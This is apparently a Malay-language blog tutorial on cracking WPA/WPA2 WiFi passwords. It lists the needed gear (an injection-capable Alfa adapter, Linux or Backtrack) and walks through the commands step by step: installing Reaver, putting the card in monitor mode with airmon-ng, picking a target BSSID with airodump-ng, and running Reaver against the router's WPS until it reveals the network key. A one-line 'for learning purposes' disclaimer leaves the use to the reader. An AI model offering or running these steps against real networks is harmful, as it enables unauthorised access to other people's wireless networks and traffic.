Halaman

Cara Crack Password Wifi WPA/WPA2

Dalam artikel yang lepas saya ada menerangkan langkah-langkah untuk crack password WiFi yang menggunakan WEP. Namun sekarang ni dah tak banyak dah rangkaian yang menggunakan sekuriti jenis WEP ini, kebanyakannya menggunakan WPA/WPA2.

Jadi kali ini saya akan menerangkan secara ringkas langkah-langkah untuk crack WPA/WPA2. Ingat, semua ini adalah untuk tujuan pembelajaran, terpulanglah bagaimana anda menggunakannya.

Sama seperti sebelumnya, anda memerlukan:

Wireless adapter yang boleh melakukan packet injection. Saya menggunakan Alfa AWUS050NH yang dibeli dari eBay.
Linux sebagai sistem operasi, ataupun Backtrack Live CD.
Berbanding dengan WEP, cara untuk crack WPA/WPA2 adalah lebih mudah kerana kita akan menggunakan Reaver. Arahannya senang, cuma anda perlu menunggu lebih lama untuk mendapatkan hasil. Jom kita mula:

1.  Install Reaver.

apt-get install reaver
2. Dapatkan nama interface bagi kad wireless anda.

iwconfig
3. Pada komputer saya, Alfa AWUS050NH adalah wlan1. Seterusnya, letakkan kad wireless anda pada keadaan monitor.

airmon-ng start wlan1
Skrin akan memaparkan nama bagi interface monitor anda, biasanya adalah mon0. Catatkan nama ini.

4. Dapatkan BSSID bagi WiFi yang anda mahu crack.

airodump-ng wlan1
Nota: Jika arahan di atas tidak berjaya, gantikan name interface kad wireless anda (dalam kes saya, ianya adalah wlan1) dengan nama interface monitor.

5. Mulakan crack dengan Reaver.

reaver -i moninterface -b bssid -vv
Sebagai contoh, arahan saya adalah reaver -i mon0 -b 34:08:04:C9:D0:04 -vv

Biarkan sahaja arahan ini berjalan sehinggalah Reaver berjaya mendapatkan password yang anda cari. Reaver akan memaparkan PSK yang boleh anda gunakan untuk masuk ke rangkaian tersebut, seperti rajah di bawah ini:

Site Meter